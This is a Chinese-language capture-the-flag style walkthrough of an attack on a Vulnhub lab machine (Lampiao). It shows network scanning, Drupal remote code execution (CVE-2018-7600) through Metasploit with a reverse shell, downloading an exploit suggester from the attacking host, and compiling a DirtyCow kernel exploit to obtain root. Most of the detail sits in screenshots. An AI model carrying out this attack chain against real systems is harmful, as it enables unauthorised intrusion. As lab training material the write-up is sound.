Linux脏牛提权毛病复现(DirtyCow)
#简述脏牛(DirtyCow)是Linux中的一个提权毛病。主要产生的缘故原由是Linux系统的内核中Copy-on-Write(COW)机制产生的竞争条件问题导致,攻击者可以破坏私有只读内存映射,并提升为本地管理员权限。
https://cdn.nlark.com/yuque/0/2024/webp/38483060/1710856894825-f1b9e41b-a997-4bd7-8795-a4a6d664d8fd.webp#averageHue=%23e3d8d4&clientId=uac8927ec-d335-4&from=drop&id=u9edb9e9e&originHeight=284&originWidth=381&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=13790&status=done&style=none&taskId=u7a70310d-6217-4584-aa6a-6dcf8d35b24&title=
#前期准备
靶机:vulnhub——Lampiao192.168.230.217
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710856950710-b1137d79-014b-49dd-a8c0-34e25c2f354f.jpeg#averageHue=%236ba2b2&clientId=uac8927ec-d335-4&from=drop&id=u1e29b082&originHeight=1152&originWidth=2239&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=205942&status=done&style=none&taskId=u6fcaf00d-98d1-40e1-b889-dec99ef00bc&title=
攻击机:Kali192.168.230.128
#复现过程
1、对 192.168.230.0/24 这一个网段进行扫描
nmap -sS 192.168.230.0/24https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710856979594-e76cafb2-81ff-4e15-bfb3-3f6ac12fcd85.jpeg#averageHue=%23262d38&clientId=uac8927ec-d335-4&from=drop&id=u888a8f8f&originHeight=1093&originWidth=1744&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=237670&status=done&style=none&taskId=ufbee12aa-8748-4f06-9604-91a9da9c9b8&title=
2、扫到靶机的IP为 192.168.230.217,接着对其进行深度的端口扫描
nmap -p 1-65535 -sV 192.168.230.217https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857337517-a30dd3d3-0517-4658-90af-f29af904bdde.jpeg#averageHue=%232b333f&clientId=uac8927ec-d335-4&from=drop&id=u6dd0280a&originHeight=1096&originWidth=1747&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=520651&status=done&style=none&taskId=udbeabb6d-58c0-4d87-977b-3a73cecade2&title=
3、发现三个开放端口,分别为 22、80、1898 ,访问80端口页面无反应,于是访问1898端口:http://192.168.230.217:1898
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857482996-b7e2fe4f-64f2-4d49-a91c-f03a28943477.jpeg#averageHue=%23f3ede4&clientId=uac8927ec-d335-4&from=drop&id=u20098c10&originHeight=1134&originWidth=1942&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=168741&status=done&style=none&taskId=u85e05a78-5e79-44ee-9c14-b573c458efd&title=
成功访问到一个登录页面
4、在该页面最下方有一行 Powered by Drupal
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857691189-c2fd3f92-75b8-475c-933d-a88b66a78b92.jpeg#averageHue=%23d1d0ce&clientId=uac8927ec-d335-4&from=drop&id=u28775521&originHeight=1126&originWidth=1939&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=174735&status=done&style=none&taskId=u8e2b884f-bdea-496b-9ed8-1aa69cf0ee8&title=
实验搜索,发现Drupal是一套使用PHP语言开发的CMS。
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857730600-81b26e09-16de-4ec2-8b29-b01555f0d79e.jpeg#averageHue=%23f9f8f8&clientId=uac8927ec-d335-4&from=drop&id=u756976c0&originHeight=1156&originWidth=2239&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=352852&status=done&style=none&taskId=ub583457a-c156-4e85-8fd9-63637f2ad01&title=
5、通过阿里云毛病库能搜索到对应的历史毛病
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857777545-0c065c4f-f515-415f-a5fc-29afd8f06d67.jpeg#averageHue=%232d803f&clientId=uac8927ec-d335-4&from=drop&id=u2b5d7846&originHeight=1156&originWidth=2239&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=288524&status=done&style=none&taskId=u0c6631c4-8447-48ff-8863-21b8409ca10&title=
其中也存在过远程代码执行毛病 CVE-2018-7600 ,具体内容如下所示:
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857979065-e1e48c1d-ca0e-4d12-9cf5-aa8ee3d475cc.jpeg#averageHue=%232a2b31&clientId=uac8927ec-d335-4&from=drop&id=u12c7316e&originHeight=978&originWidth=1516&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=235047&status=done&style=none&taskId=u50c44ad3-2e6d-4fdd-8ef8-81fd36d7674&title=
6、在msf里进行搜索对应的exp
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858050991-f040eeb2-d390-4115-9d23-f281364a4169.jpeg#averageHue=%232e313a&clientId=uac8927ec-d335-4&from=drop&id=u78387523&originHeight=1099&originWidth=1750&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=299773&status=done&style=none&taskId=u2543f3fb-784c-4a74-9411-2fcd5edc422&title=
7、选择编号为1的,配置好部门参数,包括rhost,lhost,lport等等
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858093738-ea65d1ac-e50d-4bbd-bd21-6d177e54ec91.jpeg#averageHue=%23262d39&clientId=uac8927ec-d335-4&from=drop&id=u5e83a263&originHeight=1101&originWidth=1746&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=237537&status=done&style=none&taskId=uf5ac061f-fa6a-474c-956f-2f6e24a2f6c&title=
8、输入命令run执行,成功反弹,但getuid得到的效果表现只有一个网站的权限,需要进一步提权到root
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858149654-8c8d6640-a71d-422a-9a37-ab979e9c4287.jpeg#averageHue=%23262d38&clientId=uac8927ec-d335-4&from=drop&id=u90effcfe&originHeight=1099&originWidth=1747&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=227696&status=done&style=none&taskId=uc097e360-36bf-40d7-9b4d-68e4ae55bab&title=
9、新建一个终端,使用python创建一个http服务器,并在对应目次下存放 linux-exploit-suggester.sh,然后在靶机这边通过wget命令下载
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858616108-28ae3ac9-385d-4eea-a1f6-1215c920d0bb.jpeg#averageHue=%23252a34&clientId=uac8927ec-d335-4&from=drop&id=u6819821e&originHeight=1120&originWidth=1807&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=210684&status=done&style=none&taskId=u53e3c0fb-5b64-4db1-a7c2-39f1b47da10&title=
10、chmod +x 增加执行权限之后,执行该脚本文件
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859035336-5ec359ce-094c-48d2-bc9d-cccdc498f024.jpeg#averageHue=%23272e3a&clientId=uac8927ec-d335-4&from=drop&id=uc34c25bf&originHeight=1093&originWidth=1747&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=222161&status=done&style=none&taskId=u0d0d4680-2c69-4c60-815c-ccc23098c8c&title=
11、通过脚本测试出来的效果,发现存在脏牛提权毛病
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859122287-c67bd8cf-9a4b-454f-840f-0742c4c903bd.jpeg#averageHue=%2329303c&clientId=uac8927ec-d335-4&from=drop&id=u75c64e62&originHeight=1096&originWidth=1750&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=465975&status=done&style=none&taskId=ufe6a0487-2b39-460e-ade7-77af7866150&title=
12、在Github上找对应的exp
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859197025-0c1518cc-f3be-4de7-8152-6888fb44fe93.jpeg#averageHue=%2310131b&clientId=uac8927ec-d335-4&from=drop&id=u77cbd852&originHeight=1000&originWidth=2239&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=209757&status=done&style=none&taskId=u7bca4454-ef0d-4e30-b486-2245b5daa7f&title=
13、使用同样的方式传输到靶机上面
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859243739-ddaa6fd8-f2c6-495d-b83c-81c4c4c14971.jpeg#averageHue=%23282f3b&clientId=uac8927ec-d335-4&from=drop&id=u080b66a9&originHeight=1105&originWidth=1603&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=298570&status=done&style=none&taskId=u1e9253a2-2216-4bb2-94df-31c1686c335&title=
14、解压后进入到exp对应的目次下,需要先对.cpp文件进行编译(使用make命令),之后才华执行
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859287962-5932e896-4b6e-4dda-9fb8-2cc1cd2c3fdf.jpeg#averageHue=%23282f3a&clientId=uac8927ec-d335-4&from=drop&id=u77d1690c&originHeight=1093&originWidth=1657&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=285705&status=done&style=none&taskId=u5fd81d53-6beb-41c8-b28e-9b0b3b52b58&title=
执行效果成功得到root用户的密码:dirtyCowFun
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859386643-6dd30dc1-8eab-4751-944a-9ff9543f6529.jpeg#averageHue=%23272d39&clientId=uac8927ec-d335-4&from=drop&id=u9927a53a&originHeight=516&originWidth=1405&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=103883&status=done&style=none&taskId=ud0d5eb36-c2ae-49b4-b3da-f8dab65a7ca&title=
提权成功!目前用户为root
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]